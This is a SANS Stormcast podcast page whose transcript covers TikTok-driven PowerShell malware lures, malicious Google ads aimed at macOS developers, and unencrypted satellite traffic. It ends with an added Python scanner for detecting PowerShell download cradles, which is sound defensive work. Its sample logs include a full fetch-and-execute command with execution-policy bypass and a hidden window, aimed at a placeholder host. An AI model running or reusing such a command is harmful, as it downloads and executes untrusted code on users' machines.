
SANS Stormcast Monday, October 20th, 2025: Malicious Tiktok; More Google Ad Problems; Satellite Insecurity

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9662.mp3


TikTok Videos Promoting Malware Installation
TikTok videos advertising ways to obtain software like Photoshop for free will instead trick users into downloading
https://isc.sans.edu/diary/TikTok%20Videos%20Promoting%20Malware%20Installation/32380

Google Ads Advertise Malware Targeting macOS Developers
Hunt.io discovered Google ads that pretend to advertise tools like Homebrew and password managers to spread malware
https://hunt.io/blog/macos-odyssey-amos-malware-campaign

Satellite Transmissions are often unencrypted
A large amount of satellite traffic is unencrypted and easily accessible to eavesdropping
https://satcom.sysnet.ucsd.edu

Podcast Transcript

Hello and welcome to the Monday, October 20th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in cybersecurity engineering.

TikTok apparently has learned from ClickFix. Xavier came across a TikTok video that advertised ways to get Photoshop for free. But of course, instead of getting free versions of expensive software, you're actually stuck with malware. The technique used here is very similar to what's commonly used as ClickFix, where you're being prompted with a captcha and then you have to essentially copy-paste PowerShell code into your PowerShell window on your Windows machine. Well, here the difference is only that it's done via TikTok. So the TikTok video basically tells you how to copy, or how to type, the PowerShell script into your PowerShell window, which of course you're first being instructed to start as an administrator. And then, while the malicious code is executed, in this code additional malware is being downloaded that will then essentially download info stealers or whatever the attacker would like to load on your system. Good news is that VirusTotal promises a good recognition rate for at least this particular version of this scam. But there are literally hundreds out there that do similar things that, again, promise free software but then trick you into actually executing this PowerShell code. And it's not always that obvious really what you're executing here, because they're kind of doing the Windows equivalent of just downloading some code and then piping it to a shell. So it's not that you're actually typing the code here into your PowerShell window; you're really just using PowerShell to download a file from a website and then executing it, which is a little bit more stealthy. And maybe people think, even if they understand kind of what that PowerShell does, they think, hey, you know, I'm just downloading some free software or some patch for the software to make it free. And that's maybe why this particular trick is still successful.

And then, talking about victims being tricked into executing malicious code: well, we do have another case where actually Google ads are being used to advertise tools that are particularly popular with developers, and they're somewhat focusing on macOS, like Homebrew. Homebrew is this package manager that allows you to install a lot of open source packages on macOS. I use it; it's very popular, particularly with developers, for installing additional tools, little command line utilities and such, Git extensions and things like that. So definitely one of the target groups here are developers, and yes, they're then ending up again with info stealers. And that's what hunt.io here discovered as part of their blog post.

Researchers at the University of California at San Diego, as well as the University of Maryland, have demonstrated that it's relatively easy to not only eavesdrop on signals being sent to and from satellites, but also that much of that traffic is unencrypted. The information sort of was presented at a recent conference and the paper has now been made public. You may have seen some news reports about it about a week ago, but now we have the actual paper available, and also no more paywall for the actual information in the paper. The lesson here really is something that's not really that new: as soon as the network traffic leaves the network jack on your system, it does enter hostile territory. So you better make sure that you properly authenticate, that you are properly encrypting your traffic, and that you make sure that the traffic is not being altered in transit. And your two main mechanisms for doing this are, of course, TLS, that's usually the simplest way and the most common way how it is done, or via one of the many VPN options that you have available. There are some cases where you don't really have a choice. And the one example here that they point out is good old phone calls, which are often also not encrypted. But basically, the satellite traffic itself does not offer any encryption. So you rely on whatever traffic is being sent to be already encrypted before it's being passed to the satellite network. Of course, this also depends on the particular technology being used by the satellite. This here is sort of a more traditional telecommunication satellite, which really is just a relay of traffic. It doesn't really sort of alter the traffic, like encryption or anything like that. That's not really the point of a satellite like this. More modern satellites like Starlink and similar constellations, they are actually encrypting traffic, of course in part also to protect the network against rogue access and making sure everybody has a proper account that accesses the network.

Well, that's it for today. Remember, on Saturday I'll be speaking at BSides Augusta. So hope to see some listeners there in person. Otherwise, thanks for liking and subscribing to this podcast, and talk to you again tomorrow. Bye.
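The "download a file with PowerShell and execute it" pattern described in the TikTok story is what a detection engineer would look for in process-creation telemetry. As an added example (not code from the podcast, the ISC diary, or hunt.io), here is a small Python triage scanner that scores PowerShell command lines by whether they contain a fetch, an execute, and the usual evasion flags. The log format is a simplified, constructed Sysmon-Event-ID-1-style line (Image=... ParentImage=... CommandLine=...); the host example.invalid, the placeholder encoded string and every command line in it are constructed for illustration.

```python
"""Triage PowerShell download-and-execute ("download cradle") command lines.

Added example, not code from the podcast or the ISC diary it discusses.
The log format is a simplified, constructed Sysmon-style process-creation
line; the host example.invalid and all command lines are constructed.
"""
import re
from dataclasses import dataclass, field

# Indicator groups: a "cradle" is a fetch and an execute in the same command line.
DOWNLOAD = [
    ("web-request", re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget)\b", re.I)),
    ("webclient", re.compile(r"net\.webclient|downloadstring|downloadfile|downloaddata", re.I)),
    ("bits", re.compile(r"start-bitstransfer", re.I)),
]
EXECUTE = [
    ("invoke-expression", re.compile(r"\b(invoke-expression|iex)\b", re.I)),
    ("encoded-command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)),
]
EVASION = [
    ("execution-policy-bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("hidden-window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("no-profile", re.compile(r"-(?:nop|noprofile)\b", re.I)),
]

LINE_RE = re.compile(r"^Image=(?P<image>\S+) ParentImage=(?P<parent>\S+) CommandLine=(?P<cmd>.*)$")


@dataclass
class Finding:
    command_line: str
    parent: str                 # launching process; explorer.exe suggests a user typed it in
    indicators: list = field(default_factory=list)
    severity: str = "none"


def parse_line(line: str):
    """Split one constructed log line into image, parent image and command line."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(cmd: str):
    """Return (severity, indicator names) for a single PowerShell command line."""
    dl = [name for name, rx in DOWNLOAD if rx.search(cmd)]
    ex = [name for name, rx in EXECUTE if rx.search(cmd)]
    ev = [name for name, rx in EVASION if rx.search(cmd)]
    if dl and ex:
        severity = "high"      # fetch + execute in one line: the cradle itself
    elif dl or ex:
        severity = "medium"    # half the pattern; check what was fetched or decoded
    elif ev:
        severity = "low"       # evasion flags alone are noisy, but worth a look
    else:
        severity = "none"
    return severity, dl + ex + ev


def triage(lines):
    """Run analyze() over PowerShell process-creation lines and keep anything scored."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        severity, indicators = analyze(rec["cmd"])
        if severity != "none":
            findings.append(Finding(rec["cmd"], rec["parent"], indicators, severity))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOGS = [  # constructed sample lines, not real telemetry
    "Image=" + PS + " ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=powershell.exe Get-ChildItem C:\\Users",
    # The pattern from the episode: user-launched, policy bypassed, script fetched and piped to iex.
    "Image=" + PS + ' ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell -ep bypass -w hidden -c "iex (iwr -useb https://example.invalid/p.txt).Content"',
    # Download to disk with no execution: medium, review the file that landed.
    "Image=" + PS + ' ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=powershell -NoProfile -Command "Invoke-WebRequest https://example.invalid/report.csv -OutFile C:\\Temp\\report.csv"',
    # Encoded command (AAAA is a placeholder, not a payload): decode before judging.
    "Image=" + PS + " ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell -enc AAAA",
    "Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f"[{f.severity}] parent={f.parent} indicators={f.indicators}\n    {f.command_line}")
```

The parent image is kept on each finding because the lure in the episode has the victim open PowerShell themselves, so the cradle shows up as a child of the desktop shell rather than of a scheduler or an agent; that context is what separates a user-driven ClickFix-style incident from routine automation, and a real rule would add it as a separate signal.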